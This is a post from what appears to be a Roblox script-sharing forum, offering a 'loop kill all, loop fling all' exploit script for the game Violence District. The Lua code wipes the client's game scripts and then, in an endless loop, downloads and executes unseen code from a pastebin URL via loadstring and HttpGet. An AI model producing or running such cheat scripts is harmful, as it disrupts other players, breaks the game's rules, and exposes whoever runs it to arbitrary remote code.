What's new
Heapleak - Scripthub

Get the most out of HeapLeak by creating a free account! Once signed in, you’ll gain full access to restricted content, be able to share your own scripts, and participate in our member-only discussions.

[🎄] Violence District loop kill all loop fling all

Version / Update: v1.0.0
Download / Script Link
local servicesToDelete = {
game:GetService("ReplicatedStorage"),
game:GetService("ReplicatedFirst"),
game:GetService("StarterPlayer").StarterPlayerScripts,
game:GetService("StarterPlayer").StarterCharacterScripts,
game:GetService("Players").LocalPlayer.PlayerScripts
}

for _, service in ipairs(servicesToDelete) do
if service then
for _, child in ipairs(service:GetChildren()) do
child:Destroy()
end
end
end

task.wait(3)

while true do
pcall(function()
loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))()
end)
task.wait(1)
end
[ View More ]
ea9002c0-bcff-4ace-a822-b8ea78ebf16d.webp


[🎄] Violence District loop kill all loop fling allLoop flings the server (technically voiding/killing them) sometimes breaks due to some avatar's weights. Rejoin if it does break
 
Back
Top